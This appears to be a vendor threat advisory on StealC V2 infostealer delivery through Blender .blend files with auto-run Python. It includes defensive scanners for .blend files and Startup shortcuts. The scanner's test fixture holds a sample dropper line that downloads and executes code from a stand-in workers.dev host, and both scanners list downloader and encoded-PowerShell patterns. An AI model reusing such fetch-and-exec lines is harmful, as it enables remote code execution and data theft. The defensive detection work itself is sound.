StealC V2 Infostealer Delivered via Malicious Blender 3D Asset Files: Threat Analysis and Mitigation
- Rescana
- 2 days ago
- 5 min read

Executive Summary
A newly identified cyber threat campaign is exploiting the popularity and extensibility of Blender—a widely used open-source 3D creation suite—by weaponizing 3D asset files to deliver the advanced StealC V2 data-stealing malware. This campaign, attributed to Russian-speaking threat actors, leverages Blender’s legitimate “Auto Run Python Scripts” feature to execute malicious code embedded within .blend files. Once executed, the malware establishes persistence, evades detection, and exfiltrates sensitive data from a wide array of applications, including browsers, cryptocurrency wallets, messaging platforms, and VPN clients. The attack chain is notable for its sophistication, stealth, and abuse of trusted creative supply chains, posing a significant risk to organizations and individuals in the creative, gaming, and digital asset sectors.
Threat Actor Profile
The campaign is attributed to Russian-speaking threat actors with a history of deploying StealC and leveraging Pyramid C2 infrastructure. These actors have previously targeted creative and gaming communities, often impersonating reputable organizations such as the Electronic Frontier Foundation (EFF) to increase the credibility of their lures. The current operation demonstrates a high level of technical proficiency, operational security, and adaptability, as evidenced by the use of legitimate cloud infrastructure (such as Cloudflare Workers) for command and control, and the rapid deployment of undetectable malware variants. The threat actors’ tactics, techniques, and procedures (TTPs) align with those observed in prior StealC campaigns, including the use of multi-stage loaders, redundant payloads, and advanced evasion techniques.
Technical Analysis of Malware/TTPs
The attack begins with the distribution of malicious Blender .blend files on popular 3D asset marketplaces, such as CGTrader. These files carry embedded Python text datablocks—commonly named Rig_Ui.py, mimicking the legitimate rig UI scripts that animators expect to find in a character asset—which Blender executes automatically on file open if the victim has enabled the “Auto Run Python Scripts” preference. Upon execution, the script initiates a multi-stage infection process:
The embedded Python script contacts a Cloudflare Workers domain to retrieve a malware loader. This loader then downloads a PowerShell script, which in turn fetches two ZIP archives—ZalypaGyliveraV1 and BLENDERX—from attacker-controlled IP addresses. These archives are extracted into the system’s %TEMP% directory, and malicious LNK shortcut files are placed in the Windows Startup folder to ensure persistence across reboots.
The primary payload is StealC V2, a sophisticated infostealer capable of harvesting credentials, session tokens, and sensitive files from over 23 browsers (including Google Chrome version 132 and above), more than 100 cryptocurrency wallet browser extensions, 15+ standalone wallet applications, messaging clients such as Telegram, Discord, Tox, and Pidgin, VPN clients like ProtonVPN and OpenVPN, and email clients including Thunderbird. An auxiliary Python-based stealer is also deployed for redundancy.
StealC V2 incorporates advanced evasion features, including updated User Account Control (UAC) bypass techniques and anti-analysis measures. Notably, the malware was undetected by all major antivirus engines on VirusTotal at the time of discovery, underscoring its stealth and the limitations of signature-based defenses.
The campaign’s TTPs map to several MITRE ATT&CK techniques, including T1059.006 (Command and Scripting Interpreter: Python), T1059.001 (Command and Scripting Interpreter: PowerShell), T1204.002 (User Execution: Malicious File), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1566.001 (Phishing: Spearphishing Attachment), T1112 (Modify Registry), and T1555 (Credentials from Password Stores).
Exploitation in the Wild
This campaign has been active since at least May 2025, with malicious .blend files distributed via CGTrader and potentially other 3D asset platforms. The attackers exploit Blender’s documented but risky “Auto Run Python Scripts” preference, which, when enabled, runs scripts embedded in a .blend file at open time with no further prompt. The preference exists in all supported versions of Blender, including 2.8x, 2.9x, 3.x, 4.x, and 5.x. It is disabled by default, but it is commonly switched on by artists and studios because many rig UI scripts and pipeline add-ons depend on it, and Blender’s per-file “Trusted Source” option in the Open dialog can grant the same execution to an individual file.
Victims are typically creative professionals, game developers, and digital artists who download and open 3D assets from online marketplaces. The campaign’s reliance on trusted supply chains and the absence of antivirus detection for the latest StealC V2 variant significantly increase the risk of widespread compromise. The use of legitimate cloud infrastructure for command and control further complicates detection and takedown efforts.
Victimology and Targeting
The primary targets of this campaign are users of 3D asset marketplaces, particularly those in the creative, gaming, and digital content production sectors. The attack is opportunistic, relying on the popularity of Blender and the widespread practice of downloading third-party assets to maximize its reach. While the campaign is global in scope, its effective reach is greatest in regions with large creative and gaming communities, including North America, Europe, and parts of Asia.
Victims are typically individuals and organizations that use Blender for 3D modeling, animation, and game development. The attackers exploit the trust placed in reputable asset marketplaces and the convenience of automated script execution to bypass traditional security controls. The targeting of cryptocurrency wallets, messaging apps, and VPN clients indicates a dual focus on both financial gain and potential lateral movement within compromised organizations.
Mitigation and Countermeasures
To mitigate the risk posed by this campaign, organizations and individuals should take the following actions:
Disable the “Auto Run Python Scripts” preference in Blender by navigating to Edit > Preferences > Save & Load and unchecking Auto Run Python Scripts under Blend Files. With the preference off, Blender still opens the file but withholds script execution and shows a warning when the file contains scripts; a script from a known-good source can then be allowed for that one file via the “Trusted Source” checkbox in the Open dialog, which is far narrower than a global opt-in. In managed environments the setting can also be forced off at launch with Blender’s --disable-autoexec command-line option.
Treat all 3D asset files as potentially executable content. Only download and open assets from trusted publishers, and consider testing unknown files in isolated, sandboxed environments before use in production workflows.
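Because the embedded script lives inside the .blend container rather than in a separate .py file, a downloaded asset can be triaged statically, without opening it in Blender, by walking the file's block table and looking for Text datablocks and downloader-style strings. The following is an added example written for this advisory, not code from Rescana, Blender, or the campaign: it parses the classic 12-byte .blend header and 20/24-byte block headers (which are documented), treats gzip-compressed files transparently, and reports zstd-compressed files (Blender 3.0+ with the Compress save option) as needing decompression first. The indicator labels and patterns are this example's own choices, and the sample .blend-shaped byte strings are constructed inline for offline testing; they are not real Blender files.

```python
"""Static triage of a .blend file for embedded Python (added example; not Rescana's or Blender's code)."""
import gzip
import re
import struct

GZIP_MAGIC = b"\x1f\x8b"
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"

# Strings a rig UI script has no reason to contain but a downloader stage usually does.
# Labels and patterns are this example's own choice (an assumption, not a published rule set).
# Text lines and driver expressions are stored in DATA blocks, so every payload is scanned.
INDICATORS = {
    "urllib": rb"urllib",
    "requests": rb"\brequests\b",
    "subprocess": rb"subprocess",
    "os.system": rb"os\.system",
    "powershell": rb"(?i)powershell",
    "base64": rb"base64",
    "exec": rb"\bexec\s*\(",
    "eval": rb"\beval\s*\(",
    "socket": rb"\bsocket\b",
    "workers.dev": rb"workers\.dev",
    "startup-folder": rb"(?i)programs\\+startup",
}


def decompress_if_needed(raw: bytes) -> bytes:
    """Blender 2.7x-era files may be gzip-wrapped; 3.0+ uses zstd when 'Compress' is enabled."""
    if raw.startswith(GZIP_MAGIC):
        return gzip.decompress(raw)
    if raw.startswith(ZSTD_MAGIC):
        raise RuntimeError("zstd-compressed .blend: decompress with 'zstd -d' first, then re-run")
    return raw


def read_header(data: bytes) -> dict:
    """Parse 'BLENDER' + pointer-size char ('_'=32-bit, '-'=64-bit) + endianness ('v'=LE, 'V'=BE) + 3-digit version."""
    if len(data) < 12 or data[:7] != b"BLENDER":
        raise ValueError("not a .blend file (missing BLENDER magic)")
    ptr_char, endian_char = data[7:8], data[8:9]
    if ptr_char not in (b"_", b"-") or endian_char not in (b"v", b"V"):
        raise ValueError("unsupported .blend header layout (newer large-file format?)")
    ptr_fmt = "I" if ptr_char == b"_" else "Q"
    bhead_fmt = ("<" if endian_char == b"v" else ">") + "4sI" + ptr_fmt + "II"  # code, len, old ptr, SDNA nr, count
    return {"version": data[9:12].decode("ascii"), "bhead_fmt": bhead_fmt, "bhead_len": struct.calcsize(bhead_fmt)}


def iter_blocks(data: bytes, hdr: dict):
    """Yield (code, payload) for each file block; ENDB terminates the table."""
    off = 12
    while off + hdr["bhead_len"] <= len(data):
        code, size, _old, _sdna, _count = struct.unpack_from(hdr["bhead_fmt"], data, off)
        off += hdr["bhead_len"]
        yield code, data[off:off + size]
        if code == b"ENDB":
            break
        off += size


def triage_blend(raw: bytes) -> dict:
    """Count Text datablocks ('TX' code) and indicator hits across all block payloads."""
    data = decompress_if_needed(raw)
    hdr = read_header(data)
    total = text_blocks = 0
    hits: dict[str, int] = {}
    for code, payload in iter_blocks(data, hdr):
        total += 1
        if code[:2] == b"TX":
            text_blocks += 1
        for label, pat in INDICATORS.items():
            n = len(re.findall(pat, payload))
            if n:
                hits[label] = hits.get(label, 0) + n
    # A file with Text datablocks but no hits still deserves a manual read before auto-run is trusted.
    verdict = "suspicious" if hits else ("embedded-python" if text_blocks else "no-text-datablocks")
    return {"version": hdr["version"], "blocks": total, "text_blocks": text_blocks,
            "indicators": hits, "verdict": verdict}


def build_sample_blend(script: bytes) -> bytes:
    """Constructed .blend-shaped test input (64-bit LE header, one TX block, one DATA block, ENDB). Not a real file."""
    def block(code: bytes, payload: bytes) -> bytes:
        return struct.pack("<4sIQII", code, len(payload), 0, 0, 1) + payload
    return (b"BLENDER-v300"
            + block(b"TX\x00\x00", b"\x00" * 32)       # Text ID struct placeholder
            + block(b"DATA", script)                      # where the text lines actually live
            + block(b"ENDB", b""))


BENIGN_SCRIPT = b"import bpy\n\nclass RigUI(bpy.types.Panel):\n    bl_label = 'Rig UI'\n    def draw(self, ctx):\n        self.layout.operator('pose.select_all')\n"
DROPPER_SCRIPT = b"import bpy, subprocess, urllib.request\nexec(urllib.request.urlopen('https://example.workers.dev/x').read())\n"

if __name__ == "__main__":
    for name, script in (("benign", BENIGN_SCRIPT), ("dropper", DROPPER_SCRIPT)):
        print(name, triage_blend(build_sample_blend(script)))
```

Run it over a marketplace download before enabling Auto Run for it; a `suspicious` verdict is reason enough to discard the file, and `embedded-python` means the text datablock should be read in Blender's Text Editor (with auto-run off) before it is ever trusted.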
Monitor for indicators of compromise, including suspicious PowerShell activity (in particular blender.exe spawning powershell.exe, which a rig UI script never needs to do), LNK shortcuts in the per-user or all-users Windows Startup folder whose targets resolve into %TEMP% or whose arguments launch hidden or encoded PowerShell, and outbound connections to Cloudflare Workers hosts or other command and control infrastructure associated with StealC V2.
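The Startup-folder persistence described above is easy to hunt for on an endpoint: parse each .lnk shortcut's target path and arguments and flag the ones that point into a user-writable temp location or carry hidden/encoded PowerShell switches. The block below is an added example written for this advisory, not Rescana's tooling or anything recovered from the campaign. It implements the documented Shell Link (MS-SHLLINK) header, LinkInfo and StringData layouts just far enough to recover LocalBasePath and the command-line arguments; the suspicious-path and suspicious-argument lists are this example's own heuristics, and the sample shortcut bytes are constructed inline (the VolumeID structure is omitted, which the parser does not need).

```python
"""Hunt for suspicious .lnk files in the Windows Startup folders (added example; not Rescana's code)."""
import os
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (
    0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80)

# Heuristics chosen for this example (assumptions, not a published detection rule).
SUSPICIOUS_TARGET_DIRS = ("\\temp\\", "\\users\\public\\")
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "-nop",
                   "bypass", "downloadstring", "iex", "invoke-expression")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def _cstr(buf: bytes, start: int) -> str:
    return buf[start:buf.index(b"\x00", start)].decode("cp1252", "replace")


def parse_lnk(buf: bytes) -> dict:
    """Return target path and StringData fields of a Shell Link; raises ValueError if it is not one."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", buf, 20)[0]
    off = 0x4C
    info = {"local_base_path": None, "name": None, "relative_path": None,
            "working_dir": None, "arguments": None, "icon": None}
    if flags & HAS_IDLIST:                       # skip the PIDL, we only want the plain path
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINKINFO:
        li_size, _hdr, li_flags, _vol, lbp_off, _cnrl, suffix_off = struct.unpack_from("<7I", buf, off)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath
            info["local_base_path"] = _cstr(buf, off + lbp_off) + _cstr(buf, off + suffix_off)
        off += li_size
    unicode = bool(flags & IS_UNICODE)
    for bit, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                     (HAS_ARGS, "arguments"), (HAS_ICON, "icon")):
        if flags & bit:                          # CountCharacters then the string, no terminator
            n = struct.unpack_from("<H", buf, off)[0]
            off += 2
            nbytes = n * 2 if unicode else n
            info[key] = buf[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252", "replace")
            off += nbytes
    return info


def assess_lnk(buf: bytes):
    """Parse a shortcut and list the reasons (if any) it looks like dropper persistence."""
    info = parse_lnk(buf)
    target = (info["local_base_path"] or info["relative_path"] or "").lower()
    args = (info["arguments"] or "").lower()
    reasons = []
    if any(d in target for d in SUSPICIOUS_TARGET_DIRS):
        reasons.append(f"target in user-writable temp location: {target}")
    if any(k in args for k in SUSPICIOUS_ARGS):
        reasons.append(f"suspicious arguments: {args[:80]}")
    if target.endswith(SCRIPT_HOSTS):
        reasons.append("target is a script host")
    return info, reasons


def startup_folders() -> list:
    """Per-user and all-users Startup folders, derived from environment variables (Windows only)."""
    found = []
    for var, tail in (("APPDATA", r"Microsoft\Windows\Start Menu\Programs\Startup"),
                      ("PROGRAMDATA", r"Microsoft\Windows\Start Menu\Programs\StartUp")):
        base = os.environ.get(var)
        if base and os.path.isdir(os.path.join(base, tail)):
            found.append(os.path.join(base, tail))
    return found


def scan_startup() -> list:
    findings = []
    for folder in startup_folders():
        for name in os.listdir(folder):
            if not name.lower().endswith(".lnk"):
                continue
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                buf = fh.read()
            try:
                info, reasons = assess_lnk(buf)
            except ValueError as exc:
                info, reasons = {}, [f"unparseable shortcut: {exc}"]
            if reasons:
                findings.append((path, info, reasons))
    return findings


def build_sample_lnk(target: str, args: str) -> bytes:
    """Constructed minimal shortcut for offline testing: header + LinkInfo (no VolumeID) + arguments."""
    flags = HAS_LINKINFO | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + b"\x00" * (0x4C - 24)
    base, suffix, li_hdr = target.encode("cp1252") + b"\x00", b"\x00", 28
    linkinfo = struct.pack("<7I", li_hdr + len(base) + len(suffix), li_hdr, 0x1, 0,
                           li_hdr, 0, li_hdr + len(base)) + base + suffix
    return header + linkinfo + struct.pack("<H", len(args)) + args.encode("utf-16-le")


if __name__ == "__main__":
    for path, info, reasons in scan_startup():
        print(path, info.get("local_base_path"), info.get("arguments"), reasons)
```

The same `assess_lnk` can be pointed at shortcuts collected from many hosts (for example by an EDR file-pull job), and the two heuristics map directly onto what this campaign's persistence looks like: an archive extracted to %TEMP% and a shortcut that launches it from Startup.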
Ensure that endpoint detection and response (EDR) and antivirus solutions are updated with the latest threat intelligence and signatures related to StealC V2 as they become available. However, be aware that signature-based detection may lag behind rapidly evolving malware variants.
Educate users—especially those in creative and development roles—about the risks of enabling automated script execution and the importance of verifying the provenance of downloaded assets.
Implement network segmentation and least privilege principles to limit the potential impact of a successful compromise, particularly in environments where sensitive credentials, cryptocurrency wallets, or proprietary assets are at risk.
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chains. Our platform leverages real-time threat intelligence, automated risk scoring, and actionable insights to help customers proactively defend against emerging threats and ensure the resilience of their business operations. For more information about how Rescana can help secure your organization, or for any questions regarding this advisory, please contact us at ops@rescana.com.